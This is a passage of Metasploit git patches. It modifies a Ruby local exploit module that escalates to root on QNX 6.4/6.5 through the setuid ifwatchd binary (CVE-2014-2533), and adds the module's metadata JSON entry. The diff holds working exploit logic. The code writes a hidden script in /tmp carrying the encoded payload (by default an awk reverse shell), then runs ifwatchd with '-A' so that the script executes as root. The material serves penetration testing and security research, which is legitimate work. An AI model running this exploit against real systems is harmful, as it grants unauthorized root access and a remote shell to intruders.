'cmd/unix/reverse_awk' } )) - register_options([ - OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) - ]) + register_advanced_options [ + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] end def ifwatchd_path '/sbin/ifwatchd' end + def base_dir + datastore['WritableDir'] + end + def check unless setuid? ifwatchd_path vprint_error "#{ifwatchd_path} is not setuid" @@ -80,25 +85,20 @@ class MetasploitModule < Msf::Exploit::Local CheckCode::Detected end - def base_dir - datastore['WritableDir'] - end - - def is_root? - id = cmd_exec 'id' - (id.include?('uid=0') && id.include?('root')) - end - def exploit + unless check == CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target not vulnerable' + end + if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end - unless check == CheckCode::Detected - fail_with Failure::NotVulnerable, 'Target is not vulnerable' + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" end - script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}" + script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}" print_status 'Writing interface arrival event script...' cmd_exec "echo '#!/bin/sh' > #{script_path}" @@ -107,15 +107,12 @@ class MetasploitModule < Msf::Exploit::Local exp = payload.encoded.gsub('"', '\"').gsub('$', '\$') cmd_exec "echo \"#{exp}\" >> #{script_path}" cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" + register_file_for_cleanup script_path cmd_exec "chmod +x '#{script_path}'" print_status "Executing #{ifwatchd_path}..." interface = 'lo0' cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo " - - Rex.sleep 5 - - cmd_exec "rm -f '#{script_path}'" end end From 15ce38505437c66d868a7ccffc90aaac650dd23d Mon Sep 17 00:00:00 2001 From: Metasploit Date: Sat, 6 Oct 2018 02:20:26 -0700 Subject: [PATCH 192/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index a981e29ed5..94345f86ee 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -71307,6 +71307,48 @@ "notes": { } }, + "exploit_qnx/local/ifwatchd_priv_esc": { + "name": "ifwatchd Privilege Escalation", + "full_name": "exploit/qnx/local/ifwatchd_priv_esc", + "rank": 600, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "cenobyte", + "Tim Brown", + "Brendan Coles" + ], + "description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).", + "references": [ + "CVE-2014-2533", + "BID-66449", + "EDB-32153", + "URL-http://seclists.org/bugtraq/2014/Mar/66" + ], + "is_server": true, + "is_client": false, + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-10-06 04:37:04 +0000", + "path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb", + "is_install_path": true, + "ref_name": "qnx/local/ifwatchd_priv_esc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_solaris/dtspcd/heap_noir": { "name": "Solaris dtspcd Heap Overflow", "full_name": "exploit/solaris/dtspcd/heap_noir",